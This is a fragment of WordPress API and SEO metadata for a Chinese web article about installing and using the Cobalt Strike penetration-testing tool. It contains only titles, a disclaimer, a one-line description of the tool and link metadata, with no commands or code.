\u7f51\u7855\u4e92\u8054\u5e2e\u52a9\u4e2d\u5fc3\",\"isPartOf\":{\"@id\":\"https:\/\/www.wsisp.com\/helps\/#website\"},\"datePublished\":\"2026-02-05T07:00:02+00:00\",\"dateModified\":\"2026-02-05T07:00:02+00:00\",\"author\":{\"@id\":\"https:\/\/www.wsisp.com\/helps\/#\/schema\/person\/358e386c577a3ab51c4493330a20ad41\"},\"breadcrumb\":{\"@id\":\"https:\/\/www.wsisp.com\/helps\/72428.html#breadcrumb\"},\"inLanguage\":\"zh-Hans\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.wsisp.com\/helps\/72428.html\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.wsisp.com\/helps\/72428.html#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"\u9996\u9875\",\"item\":\"https:\/\/www.wsisp.com\/helps\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\u9ed1\u5ba2\u5fc5\u5907\u5229\u5668\uff1a\u5982\u4f55\u5728\u7cfb\u7edf\u4e0a\u5b89\u88c5\u548c\u4f7f\u7528 CobaltStrike\uff1f\u9ed1\u5ba2\u6280\u672f\u96f6\u57fa\u7840\u5165\u95e8\u5230\u7cbe\u901a\u5b9e\u6218\u6559\u7a0b\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.wsisp.com\/helps\/#website\",\"url\":\"https:\/\/www.wsisp.com\/helps\/\",\"name\":\"\u7f51\u7855\u4e92\u8054\u5e2e\u52a9\u4e2d\u5fc3\",\"description\":\"\u9999\u6e2f\u670d\u52a1\u5668_\u9999\u6e2f\u4e91\u670d\u52a1\u5668\u8d44\u8baf_\u670d\u52a1\u5668\u5e2e\u52a9\u6587\u6863_\u670d\u52a1\u5668\u6559\u7a0b\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.wsisp.com\/helps\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"zh-Hans\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.wsisp.com\/helps\/#\/schema\/person\/358e386c577a3ab51c4493330a20ad41\",\"name\":\"admin\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"zh-Hans\",\"@id\":\"https:\/\/www.wsisp.com\/helps\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/gravatar.wp-china-yes.net\/avatar\/?s=96&d=mystery\",\"contentUrl\":\"https:\/\/gravatar.wp-china-yes.net\/avatar\/?s=96&d=mystery\",\"caption\":\"admin\"},\"sameAs\":[\"http:\/\/wp.wsisp.com\"],\"url\":\"https:\/\/www.wsisp.com\/helps\/author\/admin\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\u9ed1\u5ba2\u5fc5\u5907\u5229\u5668\uff1a\u5982\u4f55\u5728\u7cfb\u7edf\u4e0a\u5b89\u88c5\u548c\u4f7f\u7528 CobaltStrike\uff1f\u9ed1\u5ba2\u6280\u672f\u96f6\u57fa\u7840\u5165\u95e8\u5230\u7cbe\u901a\u5b9e\u6218\u6559\u7a0b - \u7f51\u7855\u4e92\u8054\u5e2e\u52a9\u4e2d\u5fc3","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.wsisp.com\/helps\/72428.html","og_locale":"zh_CN","og_type":"article","og_title":"\u9ed1\u5ba2\u5fc5\u5907\u5229\u5668\uff1a\u5982\u4f55\u5728\u7cfb\u7edf\u4e0a\u5b89\u88c5\u548c\u4f7f\u7528 CobaltStrike\uff1f\u9ed1\u5ba2\u6280\u672f\u96f6\u57fa\u7840\u5165\u95e8\u5230\u7cbe\u901a\u5b9e\u6218\u6559\u7a0b - \u7f51\u7855\u4e92\u8054\u5e2e\u52a9\u4e2d\u5fc3","og_description":"\u672c\u6587\u4ec5\u7528\u4e8e\u4fe1\u606f\u5b89\u5168\u5b66\u4e60&#xff0c;\u8bf7\u9075\u5b88\u76f8\u5173\u6cd5\u5f8b\u6cd5\u89c4&#xff0c;\u4e25\u7981\u7528\u4e8e\u975e\u6cd5\u9014\u5f84\u3002\u82e5\u89c2\u4f17\u56e0\u6b64\u4f5c\u51fa\u4efb\u4f55\u5371\u5bb3\u7f51\u7edc\u5b89\u5168\u7684\u884c\u4e3a&#xff0c;\u540e\u679c\u81ea\u8d1f&#xff0c;\u4e0e\u672c\u4eba\u65e0\u5173\u3002 \u4e00\u3001Cobalt Strike\u76f8\u5173\u4ecb\u7ecd 1&#xff09;Cobalt Strike\u662f\u4ec0\u4e48? Cobalt Strike&#xff08;\u7b80\u79f0CS&#xff09;\u662f\u4e00\u6b3e\u4e13\u4e1a\u7684\u56e2\u961f\u4f5c\u6218\u6e17\u900f\u6d4b\u8bd5\u5de5\u5177&#xff0c;\u5305\u542b\u5ba2\u6237\u7aef\u548c\u670d\u52a1\u7aef\u4e24\u4e2a\u90e8\u5206\u3002\u5b83\u7684\u4e3b\u8981\u529f\u80fd\u662f\u5728\u5df2\u7ecf\u53d6\u5f97\u653b\u51fb\u76ee\u6807\u63a7\u5236\u6743\u540e&#xff0c;\u7528","og_url":"https:\/\/www.wsisp.com\/helps\/72428.html","og_site_name":"\u7f51\u7855\u4e92\u8054\u5e2e\u52a9\u4e2d\u5fc3","article_published_time":"2026-02-05T07:00:02+00:00","og_image":[{"url":"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2026\/02\/20260205065957-69843fed32dd6.png"}],"author":"admin","twitter_card":"summary_large_image","twitter_misc":{"\u4f5c\u8005":"admin","\u9884\u8ba1\u9605\u8bfb\u65f6\u95f4":"6 \u5206"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/www.wsisp.com\/helps\/72428.html","url":"https:\/\/www.wsisp.com\/helps\/72428.html","name":"\u9ed1\u5ba2\u5fc5\u5907\u5229\u5668\uff1a\u5982\u4f55\u5728\u7cfb\u7edf\u4e0a\u5b89\u88c5\u548c\u4f7f\u7528 CobaltStrike\uff1f\u9ed1\u5ba2\u6280\u672f\u96f6\u57fa\u7840\u5165\u95e8\u5230\u7cbe\u901a\u5b9e\u6218\u6559\u7a0b - \u7f51\u7855\u4e92\u8054\u5e2e\u52a9\u4e2d\u5fc3","isPartOf":{"@id":"https:\/\/www.wsisp.com\/helps\/#website"},"datePublished":"2026-02-05T07:00:02+00:00","dateModified":"2026-02-05T07:00:02+00:00","author":{"@id":"https:\/\/www.wsisp.com\/helps\/#\/schema\/person\/358e386c577a3ab51c4493330a20ad41"},"breadcrumb":{"@id":"https:\/\/www.wsisp.com\/helps\/72428.html#breadcrumb"},"inLanguage":"zh-Hans","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.wsisp.com\/helps\/72428.html"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.wsisp.com\/helps\/72428.html#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"\u9996\u9875","item":"https:\/\/www.wsisp.com\/helps"},{"@type":"ListItem","position":2,"name":"\u9ed1\u5ba2\u5fc5\u5907\u5229\u5668\uff1a\u5982\u4f55\u5728\u7cfb\u7edf\u4e0a\u5b89\u88c5\u548c\u4f7f\u7528 CobaltStrike\uff1f\u9ed1\u5ba2\u6280\u672f\u96f6\u57fa\u7840\u5165\u95e8\u5230\u7cbe\u901a\u5b9e\u6218\u6559\u7a0b"}]},{"@type":"WebSite","@id":"https:\/\/www.wsisp.com\/helps\/#website","url":"https:\/\/www.wsisp.com\/helps\/","name":"\u7f51\u7855\u4e92\u8054\u5e2e\u52a9\u4e2d\u5fc3","description":"\u9999\u6e2f\u670d\u52a1\u5668_\u9999\u6e2f\u4e91\u670d\u52a1\u5668\u8d44\u8baf_\u670d\u52a1\u5668\u5e2e\u52a9\u6587\u6863_\u670d\u52a1\u5668\u6559\u7a0b","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.wsisp.com\/helps\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"zh-Hans"},{"@type":"Person","@id":"https:\/\/www.wsisp.com\/helps\/#\/schema\/person\/358e386c577a3ab51c4493330a20ad41","name":"admin","image":{"@type":"ImageObject","inLanguage":"zh-Hans","@id":"https:\/\/www.wsisp.com\/helps\/#\/schema\/person\/image\/","url":"https:\/\/gravatar.wp-china-yes.net\/avatar\/?s=96&d=mystery","contentUrl":"https:\/\/gravatar.wp-china-yes.net\/avatar\/?s=96&d=mystery","caption":"admin"},"sameAs":["http:\/\/wp.wsisp.com"],"url":"https:\/\/www.wsisp.com\/helps\/author\/admin"}]}},"_links":{"self":[{"href":"https:\/\/www.wsisp.com\/helps\/wp-json\/wp\/v2\/posts\/72428","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.wsisp.com\/helps\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.wsisp.com\/helps\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.wsisp.com\/helps\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.wsisp.com\/helps\/wp-json\/wp\/v2\/comments?post=72428"}],"version-history":[{"count":0,"href":"https:\/\/www.wsisp.com\/helps\/wp-json\/wp\/v2\/posts\/72428\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.wsisp.com\/helps\/wp-json\/wp\/v2\/media\/72408"}],"wp:attachment":[{"href":"https:\/\/www.wsisp.com\/helps\/wp-json\/wp\/v2\/media?parent=72428"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.wsisp.com\/helps\/wp-json\/wp\/v2\/categories?post=72428"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.wsisp.com\/helps\/wp-json\/wp\/v2\/tags?post=72428"},{"taxonomy":"topic","embeddable":true,"href":"https:\/\/www.wsisp.com\/helps\/wp-json\/wp\/v2\/topic?post=72428"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}